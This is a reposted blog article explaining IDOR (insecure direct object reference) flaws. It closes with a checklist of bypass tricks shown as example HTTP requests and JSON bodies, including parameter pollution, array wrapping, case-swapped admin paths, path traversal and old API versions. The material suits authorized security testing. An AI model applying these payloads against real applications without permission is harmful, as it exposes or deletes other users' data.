What is IDOR (along with IDOR Attack Method)

4 months ago 22
BOOK THIS SPACE FOR AD
ARTICLE AD

Errorfiathck

An IDOR vulnerability is a rights control problem that occurs when a direct reference to an object (files, personal information, etc.) is controllable by the user.

Often, this type of vulnerability allows horizontal granting of privileges (i.e. access to information of users with the same rights) and, in rarer cases, escalation of privileges.

As an example, let’s consider the case of a SaaS application that includes invoice read and write functions, with predefined access and thus user rights.
The term IDOR became popular with its appearance at OWASP 2007. However, this is just one example of many access control implementation mistakes that can lead to bypassing access controls.
Now imagine that rights controls are misconfigured, allowing a user to access (read and/or write) the bills of other application users simply by changing the URL.

Indeed, the user could consult one of his invoices via the following URL:

https://www.example.com/invoices/002546

And then, with or without the help of a tool, he can change the URL parameters. It should be noted that this type of exploitation is very easy with the brute force tool, for example due to the speed and configuration of the parameters, which is not much to explain (at least no one can do brute force).

Let’s take the simplest case here for example, changing your invoice ID:

https://www.example.com/invoices/002746

If this file actually exists in the database (via this ID) and we haven’t looked for anything and no legal checks have been done, we can be happy because this is called an IDOR. In fact, the impact of this type of vulnerability can be critical depending on the sensitivity of the data.

Base Step:

Create two accounts if possible or else enumerate users first.Check if the endpoint is private or public and does it contains any kind of id param.Try changing the param value to some other user and see if does anything to their account.Done !!

[ ] [ ] image profilie [ ] delete acount [ ] infromation acount [ ] VIEW & DELETE & Create api_key [ ] allows to read any comment [ ] change price [ ] chnage the coin from dollar to uaro [ ] Try decode the ID, if the ID encoded using md5,base64,etc

GET /GetUser/dmljdGltQG1haWwuY29t […]

[ ] change HTTP method

GET /users/delete/victim_id ->403

POST /users/delete/victim_id ->200

[ ] Try replacing parameter names

Instead of this:

GET /api/albums?album_id= <album id>

Try This:

GET /api/albums?account_id= <account id>

Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.

[ ] Path Traversal

POST /users/delete/victim_id ->403

POST /users/delete/my_id/..victim_id ->200

[ ] change request content-type

Content-Type: application/xml ->

Content-Type: application/json

[ ] swap non-numeric with numeric id

GET /file?id=90djbkdbkdbd29dd

GET /file?id=302

[ ] Missing Function Level Acess Control

GET /admin/profile ->401

GET /Admin/profile ->200

GET /ADMIN/profile ->200

GET /aDmin/profile ->200

GET /adMin/profile ->200

GET /admIn/profile ->200

GET /admiN/profile ->200

[ ]send wildcard instead of an id

GET /api/users/user_id ->

GET /api/users/*

[ ] Never ignore encoded/hashed ID

for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD

[ ] Google Dorking/public form

search all the endpoints having ID which the search engine may have already indexed

[ ] Bruteforce Hidden HTTP parameters

use tools like arjun , paramminer

[ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt

GET /api_v1/messages ->200

GET /api_v1/messages?user_id=victim_uuid ->200

[ ] HTTP Parameter POllution Give mult value for same parameter

GET /api_v1/messages?user_id=attacker_id&user_id=victim_id

GET /api_v1/messages?user_id=victim_id&user_id=attacker_id

[ ] change file type

GET /user_data/2341 -> 401

GET /user_data/2341.json -> 200

GET /user_data/2341.xml -> 200

GET /user_data/2341.config -> 200

GET /user_data/2341.txt -> 200

[ ] json parameter pollution

{“userid”:1234,”userid”:2542}

[ ] Wrap the ID with an array in the body

{“userid”:123} ->401

{“userid”:[123]} ->200

[ ] wrap the id with a json object

{“userid”:123} ->401

{“userid”:{“userid”:123}} ->200

[ ] Test an outdata API version

GET /v3/users_data/1234 ->401

GET /v1/users_data/1234 ->200

[ ] If the website using graphql, try to find IDOR using graphql!

GET /graphql

[…]

GET /graphql.php?query=

[…]

have a nice time .

Read Entire Article